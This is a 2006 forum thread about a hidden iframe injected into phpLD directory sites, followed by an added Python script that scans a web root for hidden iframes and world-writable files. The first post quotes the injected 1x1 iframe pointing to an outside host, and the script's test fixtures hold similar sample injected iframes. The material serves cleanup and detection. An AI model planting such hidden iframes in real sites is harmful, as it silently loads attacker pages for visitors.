ARGH!!! Need desperate help here! PHPLD directory

Discussion in 'Directories' started by iowadawg, Sep 19, 2006.

  1. #1
    I use the free version of phpld on several of my directories.
    Well, this morning something popped up on all those directories that should not be there.
    I cannot log in to the admin page because of this.

    It is an iframe that was inserted, but I cannot find where, or into what page or what template, that iframe was inserted.

    Go to http://www.hugedirectory.net
    As it loads you will see in the bottom bar something else that will try to load.
    Hit view source and at the very top is this iframe code:
    <iframe width="1" height="1" src="http://step57. info/traff/index2.php" style="border: 0;"></iframe>

    Anyone know where I need to go or what to do to eliminate this iframe?

    Thank you.
     
    iowadawg, Sep 19, 2006 IP
  2. mopacfan

    mopacfan Peon

    #2
    Have you posted this in the phpld forums?
     
    mopacfan, Sep 19, 2006 IP
  3. iowadawg

    iowadawg Prominent Member

    #3
    Yes, just posted there in the php forum and hopefully between here and there, someone can help me.

    Driving me up the wall!
    I have now had the fine pleasure of going through every darn page in the site through my cpanel hunting for this iframe code.

    Checked and checked, no extra pages or files are shown on cpanel.
    Meaning that all files and pages there are the ones I loaded up.
     
    iowadawg, Sep 19, 2006 IP
  4. SiteExpress

    SiteExpress Well-Known Member

    #4
    Joe, send me some cpanel info, and I will take a look.
     
    SiteExpress, Sep 19, 2006 IP
  5. tkilgore

    tkilgore Well-Known Member

    #5
    Sorry ..I saw this after the fact ..but I started to work on a fix for this here ..

    http://forums.digitalpoint.com/showthread.php?p=1975194#post1975194

    I do plan to make sure we get a fix that works and stop this IFRAME crap ..it is a huge problem and becoming very destructive to servers and webmasters. And yes I am infected. However, we are learning their tricks as we speak.
     
    tkilgore, Dec 22, 2006 IP
  6. wwws

    wwws Notable Member

    #6
    This happened to me. Somehow the Amazon affiliate got in the admin area. Go to phpMyAdmin and you should see and fix it.
     
    wwws, Dec 22, 2006 IP
  7. dvduval

    dvduval Notable Member

    #7
    See if your version includes this fix

    Open your submit.php file in your favorite editor and find these lines (on or around line 125):

        $data['LAST_CHECKED'] = gmdate('Y-m-d H:i:s');
        $data['DATE_ADDED'] = gmdate('Y-m-d H:i:s');
        $data['DATE_MODIFIED'] = gmdate('Y-m-d H:i:s');

    Insert these three new lines of code after them:

        $data['DESCRIPTION'] = strip_tags($data['DESCRIPTION']);
        $data['TITLE'] = strip_tags($data['TITLE']);
        $data['OWNER_NAME'] = strip_tags($data['OWNER_NAME']);
     
    dvduval, Dec 22, 2006 IP
  8. tkilgore

    tkilgore Well-Known Member

    #8
    I have a script that does it -- and changes the permission
     
    tkilgore, Dec 22, 2006 IP
  9. tkilgore

    tkilgore Well-Known Member

    #9
    How does this remove the exploit ..? This virus appends to all files it can write to.
     
    tkilgore, Dec 22, 2006 IP
  10. dvduval

    dvduval Notable Member

    #10
    I am actually not sure how the iframe code got there, and I don't know if this is something caused by a weakness in phpLD code, but what I gave you above is one thing I thought you should check. I would suggest doing a global search of all your files and search for "iframe" or similar to see where the code is located.
     
    dvduval, Dec 22, 2006 IP
  11. wwws

    wwws Notable Member

    #11
    I found the iframe (Amazon affiliate code) that was residing in the admin/category and it truncated. I had help by viewing the source and went and looked in phpMyAdmin.
     
    wwws, Dec 22, 2006 IP
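
The global file search suggested in post #10, combined with the write-permission point from posts #8 and #9, as an added example that is not part of the thread and not phpLD code: a Python scan of a web root for iframes that are 0-1 px in size or hidden with CSS, reporting the file, the line number and whether the file is world-writable. The extension list, the size threshold and the sample tree in `demo()` are assumptions constructed for illustration. It covers files only; injected markup stored in the database, as in posts #6 and #11, needs a separate search there.

```python
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(?:width|height)\s*[=:]\s*["']?\s*(\d+)""", re.IGNORECASE)
HIDING_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
EXTS = (".php", ".html", ".htm", ".tpl", ".js", ".inc")  # assumed set of served file types

def is_hidden(tag):
    """True when an <iframe ...> tag is sized 0-1 px or hidden via CSS."""
    dims = [int(n) for n in DIM_RE.findall(tag)]
    return any(n <= 1 for n in dims) or HIDING_CSS.search(tag) is not None

def scan(root):
    """Return sorted (relative path, line, world_writable, tag) for each hidden iframe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            writable = bool(os.stat(path).st_mode & 0o002)  # any user may modify it
            for m in IFRAME_RE.finditer(text):
                if is_hidden(m.group(0)):
                    lineno = text.count("\n", 0, m.start()) + 1
                    findings.append((os.path.relpath(path, root), lineno, writable, m.group(0)))
    return sorted(findings)

def demo():
    """Scan a constructed sample tree (not data taken from the thread)."""
    samples = {
        "index.php": '<iframe width="1" height="1" src="http://injected.example.invalid/x.php" style="border: 0;"></iframe>\n<?php echo "home"; ?>\n',
        "templates/main.tpl": '<html>\n<body>\n<iframe width="560" height="315" src="/video.html"></iframe>\n</body>\n',
        "include/footer.php": '<?php echo "footer"; ?>\n<IFRAME src="http://injected.example.invalid/y.php" style="display:none"></IFRAME>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, 0o666 if rel == "index.php" else 0o644)
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

A hit on the first or last line of many unrelated files points to content prepended or appended in bulk rather than to a template edit, and the world-writable flag shows which files need their permissions tightened once they are cleaned.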